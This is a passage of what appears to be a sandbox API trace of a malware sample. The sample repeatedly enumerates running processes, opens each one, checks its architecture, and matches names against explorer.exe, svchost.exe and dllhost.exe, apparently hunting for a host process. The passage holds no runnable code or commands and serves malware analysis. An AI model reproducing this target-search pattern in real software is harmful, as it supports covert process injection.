dwProcessId=0x924) returned 0xec [0197.859] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.859] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.859] CloseHandle (hObject=0xec) returned 1 [0197.859] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.922] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0197.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x954) returned 0xec [0197.923] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.923] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.923] CloseHandle (hObject=0xec) returned 1 [0197.923] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0197.923] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5b8) returned 0xec [0197.923] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.924] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0197.924] CloseHandle (hObject=0xec) returned 1 [0197.924] lstrcmpiA (lpString1="gtjtdfe", lpString2="explorer.exe") returned 1 [0197.924] lstrcmpiA (lpString1="gtjtdfe", lpString2="svchost.exe") returned -1 [0197.924] lstrcmpiA (lpString1="gtjtdfe", lpString2="dllhost.exe") returned 1 [0197.924] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0197.925] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5e4) returned 0x0 [0197.925] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 0 [0197.926] CloseHandle (hObject=0xe8) returned 1 [0197.926] Sleep (dwMilliseconds=0x3e8) [0198.956] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0198.958] Process32First (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0198.958] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0198.958] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0198.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0198.959] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0198.959] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0198.959] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0198.960] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0198.960] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0198.960] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0198.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0198.961] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0198.961] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0198.961] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0198.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0198.962] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0198.962] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0198.962] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0198.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0198.963] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.963] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0198.963] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0198.964] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.964] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0198.964] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0198.965] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.965] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0198.965] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0198.966] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0198.966] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0198.968] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.968] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0198.968] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0198.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0xec [0198.969] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.969] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.969] CloseHandle (hObject=0xec) returned 1 [0198.969] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0198.969] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0198.969] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0198.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4ac) returned 0xec [0198.970] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.970] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.970] CloseHandle (hObject=0xec) returned 1 [0198.970] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0198.970] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0198.970] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0198.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x0 [0198.971] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0198.971] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc4) returned 0xec [0198.971] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.971] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.972] CloseHandle (hObject=0xec) returned 1 [0198.972] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="explorer.exe") returned -1 [0198.972] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="svchost.exe") returned -1 [0198.972] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="dllhost.exe") returned -1 [0198.972] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0198.972] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x62c) returned 0xec [0198.972] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.972] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.972] CloseHandle (hObject=0xec) returned 1 [0198.972] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="explorer.exe") returned -1 [0198.972] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="svchost.exe") returned -1 [0198.972] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="dllhost.exe") returned -1 [0198.972] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0198.973] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x5a4) returned 0xec [0198.973] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.973] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.973] CloseHandle (hObject=0xec) returned 1 [0198.973] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="explorer.exe") returned 1 [0198.973] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="svchost.exe") returned -1 [0198.973] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="dllhost.exe") returned 1 [0198.973] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0198.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x780) returned 0xec [0198.974] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.974] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.974] CloseHandle (hObject=0xec) returned 1 [0198.974] lstrcmpiA (lpString1="definitely.exe", lpString2="explorer.exe") returned -1 [0198.974] lstrcmpiA (lpString1="definitely.exe", lpString2="svchost.exe") returned -1 [0198.974] lstrcmpiA (lpString1="definitely.exe", lpString2="dllhost.exe") returned -1 [0198.974] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0198.974] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0xec [0198.974] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.974] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.975] CloseHandle (hObject=0xec) returned 1 [0198.975] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="explorer.exe") returned 1 [0198.975] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="svchost.exe") returned -1 [0198.975] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="dllhost.exe") returned 1 [0198.975] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0198.975] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2c8) returned 0xec [0198.975] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.975] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.975] CloseHandle (hObject=0xec) returned 1 [0198.975] lstrcmpiA (lpString1="whenever.exe", lpString2="explorer.exe") returned 1 [0198.975] lstrcmpiA (lpString1="whenever.exe", lpString2="svchost.exe") returned 1 [0198.975] lstrcmpiA (lpString1="whenever.exe", lpString2="dllhost.exe") returned 1 [0198.975] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0198.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0xec [0198.976] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.976] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.976] CloseHandle (hObject=0xec) returned 1 [0198.976] lstrcmpiA (lpString1="potentially.exe", lpString2="explorer.exe") returned 1 [0198.976] lstrcmpiA (lpString1="potentially.exe", lpString2="svchost.exe") returned -1 [0198.976] lstrcmpiA (lpString1="potentially.exe", lpString2="dllhost.exe") returned 1 [0198.976] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0198.976] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x314) returned 0xec [0198.977] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.977] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.977] CloseHandle (hObject=0xec) returned 1 [0198.977] lstrcmpiA (lpString1="seeker.exe", lpString2="explorer.exe") returned 1 [0198.977] lstrcmpiA (lpString1="seeker.exe", lpString2="svchost.exe") returned -1 [0198.977] lstrcmpiA (lpString1="seeker.exe", lpString2="dllhost.exe") returned 1 [0198.977] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0198.977] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x320) returned 0xec [0198.977] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.977] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.977] CloseHandle (hObject=0xec) returned 1 [0198.977] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="explorer.exe") returned 1 [0198.977] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="svchost.exe") returned -1 [0198.977] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="dllhost.exe") returned 1 [0198.977] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0198.978] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7a4) returned 0xec [0198.978] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.978] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.978] CloseHandle (hObject=0xec) returned 1 [0198.978] lstrcmpiA (lpString1="birth bean.exe", lpString2="explorer.exe") returned -1 [0198.978] lstrcmpiA (lpString1="birth bean.exe", lpString2="svchost.exe") returned -1 [0198.978] lstrcmpiA (lpString1="birth bean.exe", lpString2="dllhost.exe") returned -1 [0198.978] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0198.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x688) returned 0xec [0198.979] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.979] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.979] CloseHandle (hObject=0xec) returned 1 [0198.979] lstrcmpiA (lpString1="ruby.exe", lpString2="explorer.exe") returned 1 [0198.979] lstrcmpiA (lpString1="ruby.exe", lpString2="svchost.exe") returned -1 [0198.979] lstrcmpiA (lpString1="ruby.exe", lpString2="dllhost.exe") returned 1 [0198.979] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0198.979] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7f0) returned 0xec [0198.979] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.979] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.979] CloseHandle (hObject=0xec) returned 1 [0198.979] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="explorer.exe") returned 1 [0198.979] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="svchost.exe") returned 1 [0198.979] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="dllhost.exe") returned 1 [0198.979] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0198.980] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x7d4) returned 0xec [0198.980] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.980] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.980] CloseHandle (hObject=0xec) returned 1 [0198.980] lstrcmpiA (lpString1="smith.exe", lpString2="explorer.exe") returned 1 [0198.980] lstrcmpiA (lpString1="smith.exe", lpString2="svchost.exe") returned -1 [0198.980] lstrcmpiA (lpString1="smith.exe", lpString2="dllhost.exe") returned 1 [0198.980] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0198.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x58c) returned 0xec [0198.981] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.981] IsWow64Process (in: hProcess=0xec, Wow64Process=0x2cf764 | out: Wow64Process=0x2cf764) returned 1 [0198.981] CloseHandle (hObject=0xec) returned 1 [0198.981] lstrcmpiA (lpString1="spicedespite.exe", lpString2="explorer.exe") returned 1 [0198.981] lstrcmpiA (lpString1="spicedespite.exe", lpString2="svchost.exe") returned -1 [0198.981] lstrcmpiA (lpString1="spicedespite.exe", lpString2="dllhost.exe") returned 1 [0198.981] Process32Next (in: hSnapshot=0xe8, lppe=0x2cf780 | out: lppe=0x2cf780*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0198.981] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x644) returned 0xec [0198.981] IsWow64Process (in: 